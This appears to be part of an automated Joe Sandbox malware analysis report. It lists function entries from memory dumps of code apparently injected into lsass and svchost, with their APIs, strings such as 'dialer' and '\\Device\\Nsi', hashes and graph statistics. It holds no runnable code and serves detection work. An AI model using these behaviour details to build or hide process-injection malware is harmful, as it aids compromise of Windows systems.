                                                                          • Source File: 00000027.00000002.3285030021.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140adfc0000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                          • String ID: csm$csm
                                                                          • API String ID: 3896166516-3733052814
                                                                          • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                          • Instruction ID: 5e9ed10956360af88f8a3a4b9cf73a15bede84b98f5d365089c0e3503e132e06
                                                                          • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                          • Instruction Fuzzy Hash: B751E432120388CBEB658B6794443DA37A3FB58B84F244117DB4947BE5CB39E5A2E700
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3288679621.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                          • String ID: csm$csm
                                                                          • API String ID: 3896166516-3733052814
                                                                          • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                          • Instruction ID: 6cac39d5d8876cbc65fde025732dcd94be71c236f1742025846821184820e854
                                                                          • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                          • Instruction Fuzzy Hash: D951AF72180780CAEB768F17958439977A0F358BA8F244256DF9D47BE5CB38D890D782
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3285030021.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140adfc0000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                          • String ID: csm$f
                                                                          • API String ID: 3242871069-629598281
                                                                          • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                          • Instruction ID: 595c9e32b9df4e514150441d0aa3e925450171a8e5ef433ea7709e32150aded9
                                                                          • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                          • Instruction Fuzzy Hash: E551E43272170487DB96CF16D404BEA3797FB48BA8F318424DB06437A8EBB4C952A704
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3288679621.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLastWrite
                                                                          • String ID: F]:82$U
                                                                          • API String ID: 442123175-3311195430
                                                                          • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                          • Instruction ID: 3e73605a521e4cce57338457d13aec77e0fda4a33a28f7c4ac6780cba42ba59d
                                                                          • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                          • Instruction Fuzzy Hash: 48417172615B8086DB219F6AE8443E977A1F7987A4F604025EF4D87BA4DB3CC941C781
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3285030021.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140adfc0000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                          • String ID: csm$f
                                                                          • API String ID: 3242871069-629598281
                                                                          • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                          • Instruction ID: fdcdef5ba31d8dbb8912a9a905e6b67567b4155f9952f6a6302e3e1a43461dee
                                                                          • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                          • Instruction Fuzzy Hash: 4831CF3122174487E792DF13E844BDA37A7FB48B98F258414EF8A037A8CB38C952D704
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3288679621.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$Free
                                                                          • String ID:
                                                                          • API String ID: 3168794593-0
                                                                          • Opcode ID: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                                                                          • Instruction ID: e0938be913c4546f92e354b3f490316f5aad01bc8c73eed3b2a93003b4ccae50
                                                                          • Opcode Fuzzy Hash: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                                                                          • Instruction Fuzzy Hash: 4C015A32A40B90C6E706DF67E94828A77A1F78DFA1F244425EF4E4372ADE38C851C791
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3288679621.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: ConsoleErrorLastMode
                                                                          • String ID:
                                                                          • API String ID: 953036326-0
                                                                          • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                          • Instruction ID: bfe30e0d5e1943aced18828ddcaefd42f41aed77c308e3009ff5d43c7c6b682c
                                                                          • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                          • Instruction Fuzzy Hash: A491AFB264075085F762DF6A94803ED3BA4F758BA8F744109DF4E67AA5DB34CC82C782
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3288679621.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: CodeInfoPageValid
                                                                          • String ID: F]:82
                                                                          • API String ID: 546120528-2422748741
                                                                          • Opcode ID: 40efbe512c95442b741ef5282b0f0ea723fdf90a90a36b1dcf043ddce602893b
                                                                          • Instruction ID: d125a4f93937241524de0fefc819b88b41a8e2e2b8d20653646faecf594ba604
                                                                          • Opcode Fuzzy Hash: 40efbe512c95442b741ef5282b0f0ea723fdf90a90a36b1dcf043ddce602893b
                                                                          • Instruction Fuzzy Hash: A381B472696B8086FB678F2B90443E977A1E34C7A0F744015EF8E476B1DA39DE45C382
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3288679621.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: _invalid_parameter_noinfo
                                                                          • String ID: *?$F]:82
                                                                          • API String ID: 3215553584-3155920265
                                                                          • Opcode ID: 30879497fba94220c0d251822a22f2ad6c70dac2b1e9d214631859fe890dbacb
                                                                          • Instruction ID: eff97464bcbd58d6b6d9f7402abaaa834f26dc8138b11644abf34dda11de57b8
                                                                          • Opcode Fuzzy Hash: 30879497fba94220c0d251822a22f2ad6c70dac2b1e9d214631859fe890dbacb
                                                                          • Instruction Fuzzy Hash: 1D51AF7278075445EB62AB6799113ED67A1A74CBF8F244511DF0D0BBEEEA78C841C382
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3285030021.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140adfc0000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: CallTranslator
                                                                          • String ID: MOC$RCC
                                                                          • API String ID: 3163161869-2084237596
                                                                          • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                          • Instruction ID: fd2f36d4469ca00d580b9035ee875e4ebab09abcf6c64778c8a765e7c8b01963
                                                                          • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                          • Instruction Fuzzy Hash: E9619F33610B888AEB21DF66D0403DE77B2FB48B89F244215EF4917BA8DB38D166D700
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3288679621.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: FileType
                                                                          • String ID: \\.\pipe\
                                                                          • API String ID: 3081899298-91387939
                                                                          • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                          • Instruction ID: c9d078df74486e421dded553d044dc307dfc5948a87b49d5b9b062cc3c97baf6
                                                                          • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                          • Instruction Fuzzy Hash: EE51E03228438181E676DB2FA1583EAA791F3CD7A4F640165DF4D03BAADA39CD44C7C2
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3288679621.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: Info
                                                                          • String ID: $F]:82
                                                                          • API String ID: 1807457897-2256556325
                                                                          • Opcode ID: c93f3108f4eee44b47daab660e7931f0d47a2e098f42ae2a4485b6e8a39e27b2
                                                                          • Instruction ID: aed91b69a857ebd8f143008fe32e8ddfd8748f94c082e14693789e3aba300262
                                                                          • Opcode Fuzzy Hash: c93f3108f4eee44b47daab660e7931f0d47a2e098f42ae2a4485b6e8a39e27b2
                                                                          • Instruction Fuzzy Hash: 1151C3726593C08BE7628F35E0843DD77A0F348754F64412AEB8D47A95DB38CA45CB81
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3288679621.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLastWrite
                                                                          • String ID: F]:82
                                                                          • API String ID: 442123175-2422748741
                                                                          • Opcode ID: 6a8b7be37c354b90c3c58bec20d11a7fb2faf8562248a756045ffe1d95056732
                                                                          • Instruction ID: 3bb8fc61173dd34b3669fe6c4d3d244dc259269f42422ba321d249a6f04bbabe
                                                                          • Opcode Fuzzy Hash: 6a8b7be37c354b90c3c58bec20d11a7fb2faf8562248a756045ffe1d95056732
                                                                          • Instruction Fuzzy Hash: B231C0B2754B4086DB21AF1AE8843C973A0F75C794F644026EF4D87B74EB38C951CB81
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3288679621.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLastWrite
                                                                          • String ID: F]:82
                                                                          • API String ID: 442123175-2422748741
                                                                          • Opcode ID: 9a54b18a8e95195701766736d0ee8c69aa1558165b06a77f74fea7402753075b
                                                                          • Instruction ID: d7c8c6202cc880b7088bfabcacc5dcece4dd317f43bb9b6ae06083d37b49d767
                                                                          • Opcode Fuzzy Hash: 9a54b18a8e95195701766736d0ee8c69aa1558165b06a77f74fea7402753075b
                                                                          • Instruction Fuzzy Hash: 3331F672224B808ADB529F1AE4403C977A0F75C790F744022EF4E83B65EB38C956D741
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3288679621.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLastModuleName
                                                                          • String ID: F]:82
                                                                          • API String ID: 2776309574-2422748741
                                                                          • Opcode ID: ab0bd3f6f2c4376db8bd34063ca6f8f85c8d865200dc56b2024b30ec5b250ea6
                                                                          • Instruction ID: 013e923800ffb75caf56305a85b8ad5ea486581032202eaa9f2e50a66a4d7950
                                                                          • Opcode Fuzzy Hash: ab0bd3f6f2c4376db8bd34063ca6f8f85c8d865200dc56b2024b30ec5b250ea6
                                                                          • Instruction Fuzzy Hash: D4319832254B808AE722CB26E4443DD77A4F38D7A4F644115EF8C47BB8DB38C944CB82
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3288679621.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: FeaturePresentProcessorcapture_previous_context
                                                                          • String ID: F]:82
                                                                          • API String ID: 3936158736-2422748741
                                                                          • Opcode ID: 00146d0d25447094cefaa5d60678f21286d9dab6d2be1c91d195ac6cff3fb679
                                                                          • Instruction ID: 5104a9858c041a76dfeb029c30ea75d9d046b0c3572822f99d436cbf249b340d
                                                                          • Opcode Fuzzy Hash: 00146d0d25447094cefaa5d60678f21286d9dab6d2be1c91d195ac6cff3fb679
                                                                          • Instruction Fuzzy Hash: 9621C074680B4086EB528B1AF86139567A4F7887A4FA00126DE8E837B1EF3CC855D3C2
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3288679621.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFileHeaderRaise
                                                                          • String ID: csm
                                                                          • API String ID: 2573137834-1018135373
                                                                          • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                          • Instruction ID: c81f436458b37827e035cf8ccd5af5f126ed8c86e3896386e64a1e0766a3eb38
                                                                          • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                          • Instruction Fuzzy Hash: D7112B32614B8082EB628B16E44439977E5F788BA8F684260EF8C077A9DF3CC955CB40
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3285030021.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140adfc0000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: __std_exception_copy
                                                                          • String ID: ierarchy Descriptor'$riptor at (
                                                                          • API String ID: 592178966-758928094
                                                                          • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                          • Instruction ID: 56ed09fddae288ef6c89d74bd241d2dfe88a9543861981f92f91ccf0ba0ae745
                                                                          • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                          • Instruction Fuzzy Hash: DCE08671650B4892DF038F22E8402D933A3DF5DB68B9891229A5C07321FA38D1FAD301
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3285030021.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140adfc0000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: __std_exception_copy
                                                                          • String ID: Locator'$riptor at (
                                                                          • API String ID: 592178966-4215709766
                                                                          • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                          • Instruction ID: 4940423c840106aa278dadeec7b987efc7fd2bbde3a41644df2d62b25ed6cadf
                                                                          • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                          • Instruction Fuzzy Hash: 05E08671610B4886DF028F22E4401D97363EF5DB58B989122CA4C07321FA38D1E6D300
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3288679621.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$AllocFree
                                                                          • String ID:
                                                                          • API String ID: 756756679-0
                                                                          • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                          • Instruction ID: 65c83ae18bbeee38c1f395d24bd21a894001158fe5ba6808c8c40ff99673c146
                                                                          • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                          • Instruction Fuzzy Hash: 0F119E35A41B5485EB46DB6BA8082A977A1FB8DFE0F284028DF4D47776DF38C842D381
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3288679621.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$AllocProcess
                                                                          • String ID:
                                                                          • API String ID: 1617791916-0
                                                                          • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                          • Instruction ID: 8c25a065afb30b7e91423b8a6a5c310c77542b609ab35f2169316764477aec7c
                                                                          • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                          • Instruction Fuzzy Hash: 47E03935A4170486EB068B63D80838A36E1EB8EB26F2480248E0907361DF7D8899D7A1

                                                                          Execution Graph

                                                                          Execution Coverage:0.7%
                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                          Signature Coverage:0%
                                                                          Total number of Nodes:81
                                                                          Total number of Limit Nodes:2

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000028.00000002.3281930657.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                          • String ID:
                                                                          • API String ID: 1683269324-0
                                                                          • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                          • Instruction ID: b559a2181ff40e2a117a780b745b7d932bb3298ad3057c49ecb9ab2035d3dd06
                                                                          • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                          • Instruction Fuzzy Hash: 9C11C030A12F0C82FB72ABE9F9387D923D7A784B85F504124DA06E1EA5EFB9C044C350

                                                                          Control-flow Graph

                                                                          APIs
                                                                            • Part of subcall function 00000195DD5C1628: GetProcessHeap.KERNEL32 ref: 00000195DD5C1633
                                                                            • Part of subcall function 00000195DD5C1628: HeapAlloc.KERNEL32 ref: 00000195DD5C1642
                                                                            • Part of subcall function 00000195DD5C1628: RegOpenKeyExW.ADVAPI32 ref: 00000195DD5C16B2
                                                                            • Part of subcall function 00000195DD5C1628: RegOpenKeyExW.ADVAPI32 ref: 00000195DD5C16DF
                                                                            • Part of subcall function 00000195DD5C1628: RegCloseKey.ADVAPI32 ref: 00000195DD5C16F9
                                                                            • Part of subcall function 00000195DD5C1628: RegOpenKeyExW.ADVAPI32 ref: 00000195DD5C1719
                                                                            • Part of subcall function 00000195DD5C1628: RegCloseKey.ADVAPI32 ref: 00000195DD5C1734
                                                                            • Part of subcall function 00000195DD5C1628: RegOpenKeyExW.ADVAPI32 ref: 00000195DD5C1754
                                                                            • Part of subcall function 00000195DD5C1628: RegCloseKey.ADVAPI32 ref: 00000195DD5C176F
                                                                            • Part of subcall function 00000195DD5C1628: RegOpenKeyExW.ADVAPI32 ref: 00000195DD5C178F
                                                                            • Part of subcall function 00000195DD5C1628: RegCloseKey.ADVAPI32 ref: 00000195DD5C17AA
                                                                            • Part of subcall function 00000195DD5C1628: RegOpenKeyExW.ADVAPI32 ref: 00000195DD5C17CA
                                                                          • Sleep.KERNEL32 ref: 00000195DD5C1AD7
                                                                          • SleepEx.KERNELBASE ref: 00000195DD5C1ADD
                                                                            • Part of subcall function 00000195DD5C1628: RegCloseKey.ADVAPI32 ref: 00000195DD5C17E5
                                                                            • Part of subcall function 00000195DD5C1628: RegOpenKeyExW.ADVAPI32 ref: 00000195DD5C1805
                                                                            • Part of subcall function 00000195DD5C1628: RegCloseKey.ADVAPI32 ref: 00000195DD5C1820
                                                                            • Part of subcall function 00000195DD5C1628: RegOpenKeyExW.ADVAPI32 ref: 00000195DD5C1840
                                                                            • Part of subcall function 00000195DD5C1628: RegCloseKey.ADVAPI32 ref: 00000195DD5C185B
                                                                            • Part of subcall function 00000195DD5C1628: RegOpenKeyExW.ADVAPI32 ref: 00000195DD5C187B
                                                                            • Part of subcall function 00000195DD5C1628: RegCloseKey.ADVAPI32 ref: 00000195DD5C1896
                                                                            • Part of subcall function 00000195DD5C1628: RegCloseKey.ADVAPI32 ref: 00000195DD5C18A0
                                                                          Memory Dump Source
                                                                          • Source File: 00000028.00000002.3281930657.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                          • String ID:
                                                                          • API String ID: 1534210851-0
                                                                          • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                          • Instruction ID: f3b7e964aa4799e71de0d0524ef43308711ea80b0fc304bbb8b55dd9ae371198
                                                                          • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                          • Instruction Fuzzy Hash: C7315171202E0951FF52ABAADA70BE963E7AB54BD4F0454218E0EE7FD5FE20C861C750

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000028.00000002.3281930657.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: dialer
                                                                          • API String ID: 0-3528709123
                                                                          • Opcode ID: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
                                                                          • Instruction ID: 8525adf6a2d64dd7061414e58bca951bdbbd2a01b88122cd2fc985ec43bc3963
                                                                          • Opcode Fuzzy Hash: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
                                                                          • Instruction Fuzzy Hash: 89D0A770353B0DC7FF26DFEA88E46E423E2EB08744F884030C90052A50DB18898D9B20

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000028.00000002.3281796722.00000195DD590000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD590000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd590000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: LibraryLoad
                                                                          • String ID:
                                                                          • API String ID: 1029625771-0
                                                                          • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                          • Instruction ID: 3c42989a6f1da65d8c668265381177c755b331e9ddf0642a5a91f75fe2288bf4
                                                                          • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                          • Instruction Fuzzy Hash: DF612632B01A90C7DB56CF65D020BBD73D7F754BA4F988125DE5927B88DA38D892CB00

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000028.00000002.3281930657.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                          • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                          • API String ID: 2119608203-3850299575
                                                                          • Opcode ID: b269dd2d9b81f1812a6309050772eb1d9569a02fca7367e1bad0c42bb49a5ac5
                                                                          • Instruction ID: dde7fd9efa89a5466707bb46948bcd2f38f9c7ac15f82b741b3087f18559b81d
                                                                          • Opcode Fuzzy Hash: b269dd2d9b81f1812a6309050772eb1d9569a02fca7367e1bad0c42bb49a5ac5
                                                                          • Instruction Fuzzy Hash: 40B1AF76212E5882EB669FA9D460BE973E6FB54B84F485016EE09B3F94EF34CC41C740
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000028.00000002.3281930657.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                          • String ID:
                                                                          • API String ID: 3140674995-0
                                                                          • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                          • Instruction ID: fc690ca620e4485241193952ba8c83509054a4c62fcfc94005514e0c22233189
                                                                          • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                          • Instruction Fuzzy Hash: B0314F72205F848AEB619FA4E8607ED73E5F784744F44442ADA4EA7F98EF38C549C710
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000028.00000002.3281930657.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                          • String ID:
                                                                          • API String ID: 1239891234-0
                                                                          • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                          • Instruction ID: 88954bb95814ee6b498564cf1bdcac9ec7b9223e226e11f4f982859e9a819e51
                                                                          • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                          • Instruction Fuzzy Hash: 77313A32215F8486EB618B69E8503DE73E5F789794F500126EA9D93F98EF38C546CB00

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000028.00000002.3281930657.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
